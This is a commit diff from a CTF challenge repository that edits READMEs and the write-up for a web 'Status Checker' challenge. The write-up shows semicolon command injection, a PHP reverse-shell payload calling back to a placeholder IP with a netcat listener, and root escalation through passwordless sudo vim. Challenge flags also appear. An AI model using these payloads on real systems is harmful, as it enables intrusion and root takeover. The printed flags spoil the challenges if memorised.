Update Dockerfile

2024-04-18 18:10:33 +08:00
14 changed files with 35 additions and 39 deletions
--- a/README.md
+++ b/README.md
@@ -1,5 +1,3 @@
 # GiTxHextech-Challenge-Repo
-This is the challenge repository of the CTF challenges that were used during the CTF competition held in RP.
+This will be the repo for submitted challenges, view folder to see accepted categories
 For any repo/general CTF questions, please PM malkbr3d on Discord
--- a/challenges/README.md
+++ b/challenges/README.md
@@ -1,4 +0,0 @@
 ## Information
 writeup.md consists of solutions from the respective challenge authors.  
 readme.md holds overall general information about the challenge.
--- a/challenges/blockchain/README.md
+++ b/challenges/blockchain/README.md
@@ -0,0 +1,3 @@
 This dir contains challenges that are related to blockchain
 ##### note: am aware that most (or all idk) are not familiar with blockchain category, however due to the nature of the CTF(open to all SOI body), we will try to be inclusive. If there are no submitted blockchain challenges, this category will be removed as a whole.
--- a/challenges/misc/Treasure
+++ b/challenges/misc/Treasure
@@ -2,7 +2,7 @@ From the description, a location name is hidden using a secret phrase.
 - Grab the 3 words mentioned in capital letters in the description.
 - Give the 3 words in what3words site url or in the search box (https://what3words.com/treasured.island.quest)
-The location of the place is shown at the bottom. (flag is in the search result)
+The location of the place is shown at the bottom.
 <img width="298" alt="image" src="https://github.com/lenebread/GiTxHextech-Challenge-Repo/assets/166520861/70a27c50-f138-404b-8b08-350ac2e689f7">
 <img width="931" alt="image" src="https://github.com/lenebread/GiTxHextech-Challenge-Repo/assets/166520861/85c4ce53-3468-49f0-93d0-1f6ad217a544">
--- a/challenges/web/Status
+++ b/challenges/web/Status
@@ -7,7 +7,7 @@ Check out this simple HTTP status checker I made!
 - Author: Goh Zavier
 - Discord Username: gzavz
 - Category: Web
- Diffculty: Easy
+- Diffculty: Medium
 ## Hints
--- a/Checker/images/wimg-3.png
+++ b/Checker/images/wimg-3.png
--- a/Checker/images/wimg-4.png
+++ b/Checker/images/wimg-4.png
--- a/Checker/images/wimg-5.png
+++ b/Checker/images/wimg-5.png
--- a/Checker/images/wimg-6.png
+++ b/Checker/images/wimg-6.png
--- a/Checker/images/wimg-7.png
+++ b/Checker/images/wimg-7.png
--- a/challenges/web/Status
+++ b/challenges/web/Status
@@ -8,16 +8,38 @@ Entering a semi-colon (;) will break the command. We can try to use the payload
 ![wimg-2](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-2.png)
-We can attempt to use the command ``; sudo -l``. We can see that we are able to run any command as sudo without a password as seen in the followings screenshot.
+We can attempt to spawn a reverse shell by first having netcat listen on our desired port. In this example, the port will be 45101 and the netcat command will be ``nc -nlvp 45101`` as seen in the following screenshot.
-![wimg-3](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/6560736ca93db43dc64520a6f5efc44f1fafbe20/challenges/web/Status%20Checker/images/wimg-3.png)
+![wimg-3](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-3.png)
-We can attempt to use the command ``; sudo ls /root/`` to list the root directory. We can see that there is a file called ``flag.txt`` as seen in the following screenshot.
+Once its listening on the port, we can use the following payload to spawn the reverse shell. Replace "YOUR-IP-HERE" with your IP address.
-![wimg-4](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/6560736ca93db43dc64520a6f5efc44f1fafbe20/challenges/web/Status%20Checker/images/wimg-4.png)
+```
 ; php -r '$sock=fsockopen("YOUR-IP-ADDRESS",45101);exec("/bin/sh -i <&3 >&3 2>&3");'
 ```
-We can read the contents of the file by using the command ``cat /roo/flag.txt``.
+Input the above payload into the input box as seen in the following screenshot.
-![wimg-5](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/6560736ca93db43dc64520a6f5efc44f1fafbe20/challenges/web/Status%20Checker/images/wimg-5.png)
+![wimg-4](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-4.png)
-The flag is: ``HEX{N3tw0rK_ErR_500_W1kS2kKiL}``
+Click on the "Check HTTP Status" and observe that the website has hung. Return to the netcat session and observe that we have gotten a shell as seen in the following screenshot.
 ![wimg-5](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/a0a1f11bace0c0ed057208ff3d3ce65661dfe2af/challenges/web/Status%20Checker/images/wimg-5.png)
 We can spawn an interactive shell using the command ``script -qc /bin/bash /dev/null``. Once done, we can explore the system. We can use the command ``sudo -l`` and see that we can run the command ``vim`` as root without a password as seen in the following screenshot.
 ![wimg-6](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/64886584ff8936fb97898bbd2e3c574d9482bacc/challenges/web/Status%20Checker/images/wimg-6.png)
 Using GTFOBins, we are able to breakout and obtain a shell as a root user using the following command:
 ```
 vim -c ':!/bin/sh'
 ```
 Using the command ``whoami`` we can see that we are now the root user as seen in the following screenshot.
 ![wimg-7](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/64886584ff8936fb97898bbd2e3c574d9482bacc/challenges/web/Status%20Checker/images/wimg-7.png)
 We can obtain the flag in the root directory by using the command ``cd /root`` and ``cat flag.txt``. 
 The flag is ``HEX{N3tw0rK_ErR_500_W1kS2kKiL}``.
--- a/warm-up/images/img-1.png
+++ b/warm-up/images/img-1.png
--- a/warm-up/images/img-2.png
+++ b/warm-up/images/img-2.png
--- a/warm-up/writeup.md
+++ b/warm-up/writeup.md
@@ -1,23 +0,0 @@
 This challenge requires you to view source of the HTML pages. There are two ways to complete this.
 # First Method
 Navigate to the challenge link. We are provided with a site that says to read the description again. Alternatively, we can also view the page source and see that there is a hidden text that links to another page called "why.html" as seen in the following screenshot.
 ![img-1](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/f3f37f739daf08fdc235b1758542b39fd8cefd9d/challenges/web/web%20warm-up/images/img-1.png)
 Once on the "why.html" page, we are given a hint as to how we can obtain the flag.
 Viewing the page source again and we are able to see that our flag is hidden on the page as seen in the following screenshot.
 ![img-2](https://github.com/lenebread/GiTxHextech-Challenge-Repo/blob/f3f37f739daf08fdc235b1758542b39fd8cefd9d/challenges/web/web%20warm-up/images/img-2.png)
 The flag is: ``HEX{B@s1c_w3B_012siXJv}``
 # Second Method
 Reading the description, we can see that there is a text called ``why.html``. This can be a hint and we can attempt to navigate to the page called ``why.html``.
 Upon navigating to it, we are given a hint as to how we can obtain the flag. We can obtain it by viewing the page source.
 The flag is: ``HEX{B@s1c_w3B_012siXJv}``
		`@@ -0,0 +1,3 @@`
							`This dir contains challenges that are related to blockchain`

							`##### note: am aware that most (or all idk) are not familiar with blockchain category, however due to the nature of the CTF(open to all SOI body), we will try to be inclusive. If there are no submitted blockchain challenges, this category will be removed as a whole.`